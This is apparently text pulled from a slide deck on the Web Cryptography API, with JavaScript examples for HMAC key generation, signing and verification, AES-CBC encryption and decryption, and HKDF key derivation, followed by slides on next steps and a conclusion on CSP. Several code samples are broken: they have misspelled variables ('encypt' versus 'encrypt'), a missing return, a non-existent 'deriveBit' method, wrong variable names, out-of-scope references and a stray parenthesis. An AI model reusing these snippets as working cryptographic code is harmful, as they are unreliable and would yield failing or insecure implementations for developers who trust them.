  • 37. Key Generation - HMAC var promise = crypto.subtle.generateKey( {name: "hmac", hash: {name: "sha-256"}},// Algorithm true, // Extractable ["sign", "verify"]); // KeyUsage promise.then(function(key) { console.log(key.type); // secret console.log(key.usages); // sign, verify console.log(key.algorithm.name); // HMAC console.log(key.algorithm.hash.name); // SHA-256 console.log(key.algorithm.length); // 512 });
  • 38. Sign & Verify - HMAC var promise = crypto.subtle.sign( {name:"HMAC"}, key, typedArray); promise.then(function(mac){ console.log(bytesToHexString(mac)); }); var verify = crypto.subtle.verify( {name:"HMAC"}, key, mac, typedArray); verify.then(function(verified){ console.log(verified); // true or false });
  • 39. Encrypt & Decrypt - AES-CBC var promise = crypto.subtle.importKey( ’raw’, keyData, {’name’:’aes-cbc’, iv: initialVector}, false, [’encrypt’, ’decrypt’]); var encypt = promise.then(function(key) { crypto.subtle.encrypt( {’name’:’aes-cbc’, iv: initialVector}, key, plainText)}); encrypt.then( function(ct) { console.log(new Uint8Array(ct)); });
  • 40. Encrypt & Decrypt - AES-CBC var promise = crypto.subtle.importKey( ’raw’, keyData, {’name’:’aes-cbc’, iv: initialVector}, false, [’encrypt’, ’decrypt’]); var encypt = promise.then(function(key) { crypto.subtle.encrypt( {’name’:’aes-cbc’, iv: initialVector}, key, plainText)}); encrypt.then( function(ct) { console.log(new Uint8Array(ct)); }); var decrypt = crypto.subtle.decrypt( {’name’:’aes-cbc’, iv: initialVector}, key, ct) ); decrypt.then( function(byte){ var b = new Uint8Array(byte); var decrypt = ""; for (var i=0;i<b.byteLength;i++) decrypt += String.fromCharCode(b[i]); console.log(decrypt); });
  • 41. DeriveKey/DeriveBits var promise = crypto.subtle.importKey( "raw", hexStringToUint8Array(kHkdfKey), {name: "HKDF"}, true, [’deriveKey’, ’deriveBits’]); promise.then(function(key) { var deriveBit = crypto.subtle.deriveBit( {name: "HKDF", hash: "SHA-256", salt: new Uint8Array(), info: new Uint8Array()}, key, 0); deriveBit.then(function(mac) { console.log(bytesToHexString(result)); }); });
  • 42. Next Steps Main area of focus in next revision of WebCrypto.7 Multi-factor authentication Authentication mechanism should be standardized. Hardware token as way of authorization. Secure element access. Right level of abstraction to make key available outside browser. Handling different keys: User Key, Service Key, Platform Key and Device Keys. Key material should be available outside browser environment and bound to a local authenticator. Ability to verify source of the key i.e. attestation provenance. 7 http://www.w3.org/2012/webcrypto/webcrypto-next-workshop/
  • 43. Conclusion CSP and Web Crypto are two separate Web Security mechanism. JavaScript code needs to be verifiable, to trust origin with ”remote code execution”. CSP provide white-listing your script code and WebCrypto provides way of securing your data. CSP adoption might take time, but its usage might reflect in top alexa sites. Hardware token with authentication simplification will improve user authentication. Key management and retrieval across platform is going to be big boost for Web Crypto adoption.